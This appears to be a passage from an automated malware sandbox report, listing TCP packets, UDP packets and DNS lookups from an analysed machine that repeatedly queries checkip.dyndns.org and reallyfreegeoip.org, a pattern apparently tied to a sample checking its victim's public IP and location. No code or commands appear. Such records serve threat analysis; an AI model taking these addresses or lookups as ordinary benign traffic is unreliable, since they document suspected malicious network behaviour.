                          Aug 27, 2024 20:03:40.353274107 CEST4974680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:40.358057022 CEST8049746158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:40.943389893 CEST8049746158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:40.944641113 CEST49747443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:40.944701910 CEST44349747188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:40.944808006 CEST49747443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:40.945125103 CEST49747443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:40.945156097 CEST44349747188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:40.985840082 CEST4974680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:41.406280041 CEST44349747188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:41.407975912 CEST49747443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:41.407989025 CEST44349747188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:41.556576967 CEST44349747188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:41.556668043 CEST44349747188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:41.556901932 CEST49747443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:41.557379961 CEST49747443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:41.560911894 CEST4974680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:41.562196016 CEST4975080192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:41.567405939 CEST8049750158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:41.567500114 CEST4975080192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:41.567612886 CEST4975080192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:41.567939997 CEST8049746158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:41.568041086 CEST4974680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:41.573210001 CEST8049750158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:41.730761051 CEST44349726173.222.162.64192.168.2.6
                          Aug 27, 2024 20:03:41.730844975 CEST49726443192.168.2.6173.222.162.64
                          Aug 27, 2024 20:03:42.139293909 CEST8049750158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:42.142378092 CEST49751443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:42.142424107 CEST44349751188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:42.146964073 CEST49751443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:42.147253036 CEST49751443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:42.147264004 CEST44349751188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:42.188992977 CEST4975080192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:42.624958038 CEST44349751188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:42.626744032 CEST49751443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:42.626766920 CEST44349751188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:42.776257992 CEST44349751188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:42.776366949 CEST44349751188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:42.776424885 CEST49751443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:42.777079105 CEST49751443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:42.782299995 CEST4975280192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:42.789781094 CEST8049752158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:42.789943933 CEST4975280192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:42.789943933 CEST4975280192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:42.795248032 CEST8049752158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:43.394529104 CEST8049752158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:43.396011114 CEST49753443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:43.396045923 CEST44349753188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:43.396123886 CEST49753443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:43.396516085 CEST49753443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:43.396527052 CEST44349753188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:43.438999891 CEST4975280192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:43.867696047 CEST44349753188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:43.870326042 CEST49753443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:43.870345116 CEST44349753188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:44.010613918 CEST44349753188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:44.010704041 CEST44349753188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:44.010886908 CEST49753443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:44.011447906 CEST49753443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:44.015394926 CEST4975280192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:44.016563892 CEST4975480192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:44.023194075 CEST8049752158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:44.023308039 CEST4975280192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:44.023848057 CEST8049754158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:44.023930073 CEST4975480192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:44.024097919 CEST4975480192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:44.030523062 CEST8049754158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:45.398838997 CEST8049754158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:45.399986982 CEST49755443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:45.400032043 CEST44349755188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:45.400099039 CEST49755443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:45.400350094 CEST49755443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:45.400367975 CEST44349755188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:45.438926935 CEST4975480192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:45.539798021 CEST4975680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:45.545762062 CEST8049756158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:45.545834064 CEST4975680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:45.546119928 CEST4975680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:45.551318884 CEST8049756158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:45.877517939 CEST44349755188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:45.879189014 CEST49755443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:45.879210949 CEST44349755188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:46.547883987 CEST8049756158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:46.548103094 CEST44349755188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:46.548182964 CEST44349755188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:46.548264027 CEST49755443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:46.549132109 CEST49755443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:46.552124023 CEST4975680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:46.552515984 CEST4975480192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:46.553677082 CEST4975780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:46.557209969 CEST8049756158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:46.557977915 CEST8049754158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:46.558418989 CEST4975480192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:46.558885098 CEST8049757158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:46.559041977 CEST4975780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:46.559134007 CEST4975780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:46.564157009 CEST8049757158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:46.827107906 CEST8049756158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:46.864326954 CEST49758443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:46.864376068 CEST44349758188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:46.865462065 CEST49758443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:46.869936943 CEST49758443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:46.869967937 CEST44349758188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:46.876468897 CEST4975680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:46.876671076 CEST4970280192.168.2.6151.101.2.133
                          Aug 27, 2024 20:03:46.876738071 CEST4970380192.168.2.6151.101.66.133
                          Aug 27, 2024 20:03:46.882167101 CEST8049702151.101.2.133192.168.2.6
                          Aug 27, 2024 20:03:46.882297039 CEST4970280192.168.2.6151.101.2.133
                          Aug 27, 2024 20:03:46.882864952 CEST8049703151.101.66.133192.168.2.6
                          Aug 27, 2024 20:03:46.883162975 CEST4970380192.168.2.6151.101.66.133
                          Aug 27, 2024 20:03:47.353240013 CEST44349758188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:47.353327990 CEST49758443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:47.355020046 CEST49758443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:47.355030060 CEST44349758188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:47.355271101 CEST44349758188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:47.401932001 CEST49758443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:47.448506117 CEST44349758188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:47.515155077 CEST44349758188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:47.515235901 CEST44349758188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:47.515321970 CEST49758443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:47.520184994 CEST49758443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:47.858067989 CEST4975680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:47.864181995 CEST8049756158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:48.035428047 CEST8049756158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:48.037353992 CEST49759443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:48.037399054 CEST44349759188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:48.037498951 CEST49759443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:48.037844896 CEST49759443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:48.037868023 CEST44349759188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:48.079576969 CEST4975680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:48.119939089 CEST8049757158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:48.121097088 CEST49760443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:48.121148109 CEST44349760188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:48.121218920 CEST49760443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:48.121483088 CEST49760443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:48.121493101 CEST44349760188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:48.173324108 CEST4975780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:48.532701015 CEST44349759188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:48.534744024 CEST49759443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:48.534769058 CEST44349759188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:48.624569893 CEST44349760188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:48.626441002 CEST49760443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:48.626471043 CEST44349760188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:48.682893038 CEST44349759188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:48.682990074 CEST44349759188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:48.683037043 CEST49759443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:48.683798075 CEST49759443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:48.688043118 CEST4975680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:48.689430952 CEST4976180192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:48.694017887 CEST8049756158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:48.694086075 CEST4975680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:48.694665909 CEST8049761158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:48.694746017 CEST4976180192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:48.694860935 CEST4976180192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:48.699987888 CEST8049761158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:48.769258022 CEST44349760188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:48.769376040 CEST44349760188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:48.769530058 CEST49760443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:48.770167112 CEST49760443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:48.773680925 CEST4975780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:48.774976969 CEST4976280192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:48.779458046 CEST8049757158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:48.779541016 CEST4975780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:48.779876947 CEST8049762158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:48.779943943 CEST4976280192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:48.780050039 CEST4976280192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:48.785048962 CEST8049762158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:49.816402912 CEST8049762158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:49.817688942 CEST49763443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:49.817733049 CEST44349763188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:49.817792892 CEST49763443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:49.818074942 CEST49763443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:49.818084002 CEST44349763188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:49.858542919 CEST4976280192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:49.882810116 CEST8049761158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:49.884413958 CEST4976180192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:49.887845039 CEST49764443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:49.887887001 CEST44349764188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:49.887962103 CEST49764443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:49.888223886 CEST49764443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:49.888235092 CEST44349764188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:49.892096043 CEST8049761158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:49.892164946 CEST4976180192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:50.279696941 CEST44349763188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:50.311714888 CEST49763443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:50.311753035 CEST44349763188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:50.372492075 CEST44349764188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:50.373975992 CEST49764443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:50.374010086 CEST44349764188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:50.431499004 CEST44349763188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:50.432010889 CEST44349763188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:50.432068110 CEST49763443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:50.432467937 CEST49763443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:50.512439013 CEST44349764188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:50.512562990 CEST44349764188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:50.512619019 CEST49764443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:50.513196945 CEST49764443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:50.517934084 CEST4976580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:50.524003983 CEST8049765158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:50.524085045 CEST4976580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:50.524183035 CEST4976580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:50.530911922 CEST8049765158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:51.098942995 CEST8049765158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:51.100172997 CEST49766443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:51.100219965 CEST44349766188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:51.100282907 CEST49766443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:51.100564003 CEST49766443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:51.100574017 CEST44349766188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:51.142062902 CEST4976580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:51.565424919 CEST44349766188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:51.567104101 CEST49766443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:51.567127943 CEST44349766188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:51.727400064 CEST44349766188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:51.727494001 CEST44349766188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:51.727539062 CEST49766443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:51.728086948 CEST49766443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:51.732095957 CEST4976580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:51.733449936 CEST4976780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:51.737957954 CEST8049765158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:51.738013983 CEST4976580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:51.738627911 CEST8049767158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:51.738692045 CEST4976780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:51.738770962 CEST4976780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:51.744000912 CEST8049767158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:52.927912951 CEST8049767158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:52.946605921 CEST49768443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:52.946655035 CEST44349768188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:52.946732998 CEST49768443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:52.950464964 CEST49768443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:52.950479031 CEST44349768188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:52.985814095 CEST4976780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:53.461765051 CEST44349768188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:53.463619947 CEST49768443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:53.463639021 CEST44349768188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:53.734950066 CEST44349768188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:53.735039949 CEST44349768188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:53.735090017 CEST49768443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:53.735692978 CEST49768443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:53.766474962 CEST4976780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:53.767621994 CEST4976980192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:53.772370100 CEST8049767158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:53.772439003 CEST4976780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:53.772984028 CEST8049769158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:53.773045063 CEST4976980192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:53.773138046 CEST4976980192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:53.778053045 CEST8049769158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:54.681615114 CEST8049769158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:54.683866024 CEST49770443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:54.683907986 CEST44349770188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:54.683979034 CEST49770443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:54.684242010 CEST49770443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:54.684252977 CEST44349770188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:54.735800028 CEST4976980192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:55.169342041 CEST44349770188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:55.172349930 CEST49770443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:55.172382116 CEST44349770188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:55.320142031 CEST44349770188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:55.320240021 CEST44349770188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:55.320486069 CEST49770443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:55.320871115 CEST49770443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:55.325155973 CEST4976980192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:55.326131105 CEST4977380192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:55.330975056 CEST8049773158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:55.331048012 CEST4977380192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:55.331221104 CEST4977380192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:55.331235886 CEST8049769158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:55.331425905 CEST4976980192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:55.337106943 CEST8049773158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:56.602490902 CEST8049773158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:56.603857040 CEST49774443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:56.603904009 CEST44349774188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:56.603955984 CEST49774443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:56.604264021 CEST49774443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:56.604279041 CEST44349774188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:56.657676935 CEST4977380192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:57.085655928 CEST44349774188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:57.087487936 CEST49774443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:57.087524891 CEST44349774188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:57.238568068 CEST44349774188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:57.238646030 CEST44349774188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:57.238907099 CEST49774443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:57.239326000 CEST49774443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:57.242753029 CEST4977380192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:57.244060040 CEST4977580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:57.249627113 CEST8049773158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:57.249689102 CEST4977380192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:57.250694036 CEST8049775158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:57.250830889 CEST4977580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:57.250965118 CEST4977580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:57.260797977 CEST8049775158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:57.833131075 CEST8049775158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:57.834872961 CEST49777443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:57.834928036 CEST44349777188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:57.835093975 CEST49777443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:57.835407019 CEST49777443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:57.835417986 CEST44349777188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:57.876465082 CEST4977580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:58.330503941 CEST44349777188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:58.332382917 CEST49777443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:58.332401991 CEST44349777188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:58.489597082 CEST44349777188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:58.489692926 CEST44349777188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:58.489799023 CEST49777443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:58.490489960 CEST49777443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:04:28.512856007 CEST8049727158.101.44.242192.168.2.6
                          Aug 27, 2024 20:04:28.512949944 CEST4972780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:04:34.792697906 CEST8049737158.101.44.242192.168.2.6
                          Aug 27, 2024 20:04:34.794965982 CEST4973780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:04:39.067240953 CEST4970680192.168.2.6199.232.214.172
                          Aug 27, 2024 20:04:39.073620081 CEST8049706199.232.214.172192.168.2.6
                          Aug 27, 2024 20:04:39.073679924 CEST4970680192.168.2.6199.232.214.172
                          Aug 27, 2024 20:04:47.315859079 CEST8049750158.101.44.242192.168.2.6
                          Aug 27, 2024 20:04:47.315933943 CEST4975080192.168.2.6158.101.44.242
                          Aug 27, 2024 20:04:54.808978081 CEST8049762158.101.44.242192.168.2.6
                          Aug 27, 2024 20:04:54.809077024 CEST4976280192.168.2.6158.101.44.242
                          Aug 27, 2024 20:05:03.073719978 CEST8049775158.101.44.242192.168.2.6
                          Aug 27, 2024 20:05:03.073777914 CEST4977580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:05:09.798929930 CEST4973780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:05:09.809067965 CEST8049737158.101.44.242192.168.2.6

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Aug 27, 2024 20:03:15.905700922 CEST6181053192.168.2.61.1.1.1
                          Aug 27, 2024 20:03:15.914675951 CEST53618101.1.1.1192.168.2.6
                          Aug 27, 2024 20:03:17.500139952 CEST5530153192.168.2.61.1.1.1
                          Aug 27, 2024 20:03:17.509916067 CEST53553011.1.1.1192.168.2.6

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Aug 27, 2024 20:03:15.905700922 CEST192.168.2.61.1.1.10xe5c6Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                          Aug 27, 2024 20:03:17.500139952 CEST192.168.2.61.1.1.10x2d2fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Aug 27, 2024 20:03:15.914675951 CEST1.1.1.1192.168.2.60xe5c6No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                          Aug 27, 2024 20:03:15.914675951 CEST1.1.1.1192.168.2.60xe5c6No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                          Aug 27, 2024 20:03:15.914675951 CEST1.1.1.1192.168.2.60xe5c6No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                          Aug 27, 2024 20:03:15.914675951 CEST1.1.1.1192.168.2.60xe5c6No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                          Aug 27, 2024 20:03:15.914675951 CEST1.1.1.1192.168.2.60xe5c6No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                          Aug 27, 2024 20:03:15.914675951 CEST1.1.1.1192.168.2.60xe5c6No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                          Aug 27, 2024 20:03:17.509916067 CEST1.1.1.1192.168.2.60x2d2fNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                          Aug 27, 2024 20:03:17.509916067 CEST1.1.1.1192.168.2.60x2d2fNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                          Aug 27, 2024 20:03:19.814389944 CEST1.1.1.1192.168.2.60xf9a2No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
